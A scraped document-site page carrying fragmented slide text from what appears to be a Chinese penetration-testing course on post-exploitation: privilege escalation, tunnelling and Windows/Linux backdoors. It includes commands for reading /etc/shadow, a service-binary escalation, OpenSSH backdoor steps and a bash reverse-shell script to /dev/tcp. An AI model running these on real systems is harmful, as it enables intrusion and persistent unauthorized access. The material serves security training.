- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
                        查看更多
                        
                    
                后渗透测试实践;在拿到了一系列系统的访问权限或者webshell后,接下来就进入一个很重要的阶段,即后渗透测试阶段。在汇报渗透测试结果时,客户更想得到的成果是本次渗透能够影响目标公司业务运行的战利品,而不仅仅是一系列系统的访问权限,所以需要通过后渗透测试阶段扩大战果。;权限提升;Windows令牌窃取
;Windows令牌窃取;Windows令牌窃取;Windows配置错误提权
;Windows配置错误提权;上传文件至C:\phpstudy pro\并重命名为phpstudy.exe,等待服务重启
或者手动重启服务
sc stop phpStudySrv
sc start phpStudySrv
可以看到权限是system
;Windows不安全的注册表权限配置;Windows不安全的注册表权限配置;Windows不安全的注册表权限配置;Windows bypassuac;Windows bypassuac;Windows bypassuac;Linux Suid提权
;Linux SUDO提权;Linux内核提权;Linux内核提权
;Linux内核提权
;Linux内核提权;Linux 内核提权
;权限提升;信息收集;Windows权限管理;Windows权限管理;Windows权限管理;Windows权限管理;Windows权限管理;信息收集常用命令;linux内核、操作系统版本
;linux环境变量信息
;linux服务进程
;linux计划任务
;linux敏感文件
;cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
id
who
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E ^# /etc/passwd |
awk -Fa: $3 == 0 { print $1}
cat /etc/sudoers
sudo -l;linux网络信息
;msf中主要的获取信息模块:;权限提升;横向渗透;什么是代理
;代理请求过程;正向代理;正向代理的适用场景
;反向代理
;反向代理的适用场景
;正向代理与反向代理的区别
;端口转发
;端口映射
;端口映射与转发的区别;端口转发之LCX;端口转发之portmap;端口映射(本地端口转发)之LCX.EXE;常用隧道分类;SSH通道;SSH端口转发
;SSH socks代理;基于http的转发与socket代理;基于http的转发与socket代理;EarthWorm工具;EarthWorm工具;EarthWorm工具;MSF开启代理隧道实例;MSF开启代理隧道实例
;MSF开启代理隧道实例
;MSF开启代理隧道实例;MSF开启代理隧道实例;MSF开启代理隧道实例;MSF开启代理隧道实例
;横向渗透;横向渗透;权限提升;Windows后门持久化;Windows隐藏文件夹及文件;Windows隐藏文件夹及文件;Windows隐藏文件夹及文件;Windows隐藏文件夹及文件;Windows系统隐藏??户;Windows系统隐藏账户;Windows系统隐藏账户;Windows系统隐藏账户;Windows系统隐藏账户;Windows映像劫持;Windows映像劫持;Windows映像劫持;Windows映像劫持;Windows映像劫持;Windows映像劫持;Windows开始菜单启动项;Windows计划任务后门;Windows自启动服务后门;Windows文件关联;Windows文件关联;linux隐藏文件及文件夹;linux添加普通用户;linux一句话添加root用户;linux隐身登录;linux ssh公钥登陆
;linux ssh公钥登陆;linux ssh公钥登陆;linux软链接后门;linux软链接后门
;1.记录原来的版本号:ssh –V
2.下载对应版本或版本略高一点
/ubuntu/+source/openssh
/pkg/openssh
/pub/OpenBSD/OpenSSH/portable/
3.修改源码(sshconnect2.c/auth-passwd.c/monitor.c);linux openssh后门;linux openssh后门;linux openssh后门;linux openssh后门;linux SUID后门;linux cron后门;1.准备反弹脚本test.sh
#!/bin/bash
bash -i  /dev/tcp/31/8899 01
赋予执行权限:chmod +sx test.sh;受影响版本:Vim  8.1.1365, Neovim  0.3.6;linux ICMP后门;R
                您可能关注的文档
- 渗透测试技术 课件 第3章-3.3-被动信息收集.pptx
- 渗透测试技术 课件 第3章-3.4-主动信息收集.pptx
- 渗透测试技术 课件 第4章-4.1-漏洞扫描简介.pptx
- 渗透测试技术 课件 第4章-4.2-网络漏洞扫描工具.pptx
- 渗透测试技术 课件 第4章-4.3-Web应用漏洞扫描工具.pptx
- 渗透测试技术 课件 第5章-5.1-Web应用渗透简介.pptx
- 渗透测试技术 课件 第5章-5.2-SQL注入攻击.pptx
- 渗透测试技术 课件 第5章-5.3-XSS攻击.pptx
- 渗透测试技术 课件 第5章-5.4-CSRF攻击.pptx
- 渗透测试技术 课件 第5章-5.5-文件上传漏洞.pptx
最近下载
- 2024年广东省东莞市东华高级中学自主招生数学试卷.pdf VIP
- 广东省深圳市深圳中学2024-2025学年高一上学期期中物理试题.docx VIP
- 2025年上海高考历史试卷及答案.docx VIP
- 湖南省视频信访系统建设标准规范.doc VIP
- 2025至2030中国PBT改性树脂行业细分市场及应用领域与趋势展望研究报告.docx VIP
- 广东省东莞市东华高级中学、东华松山湖高级中学2024-2025学年高一(上)月考数学试卷(含答案).pdf VIP
- 2025年心理治疗师《心理咨询伦理学》备考题库及答案解析.docx VIP
- 考研护理综合模拟试题及答案解析(3).pdf VIP
- 呼吸机的使用方法及护理ppt课件-2024鲜版.ppt
- 2025年南昌大学第一附属医院科研助理岗位招聘1人笔试参考题库附答案解析.docx VIP
 原创力文档
原创力文档 
                        

文档评论(0)